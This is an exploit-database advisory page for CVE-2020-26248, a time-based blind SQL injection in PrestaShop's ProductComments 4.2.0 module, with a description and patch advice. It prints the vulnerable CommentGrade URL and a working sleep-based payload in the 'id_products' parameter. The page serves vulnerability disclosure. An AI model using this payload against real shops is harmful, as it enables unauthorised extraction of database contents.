header-logo
Suggest Exploit
vendor:
ProductComments
by:
Frederic ADAM
8.2
CVSS
HIGH
Time Based Blind SQL Injection
89
CWE
Product Name: ProductComments
Affected Version From: 4.2.0
Affected Version To: 4.2.0
Patch Exists: Yes
Related CWE: CVE-2020-26248
CPE: a:prestashop:productcomments:4.2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Debian 10
2020

PrestaShop ProductComments 4.2.0 – ‘id_products’ Time Based Blind SQL Injection

This vulnerability allows an attacker to inject malicious SQL code into the 'id_products' parameter of the 'CommentGrade' controller of the PrestaShop ProductComments module. This can be exploited to perform a time-based blind SQL injection attack, allowing an attacker to extract data from the database.

Mitigation:

The vendor has released an update to address this vulnerability. Users should update to the latest version of the PrestaShop ProductComments module.
Source

Exploit-DB raw data:

​# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Date: 2020-12-15
# Exploit Author: Frederic ADAM
# Author contact: contact@fadam.eu
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://github.com/PrestaShop/productcomments
# Version: 4.2.0
# Tested on: Debian 10
# CVE : CVE-2020-26248

http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]

Example:
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)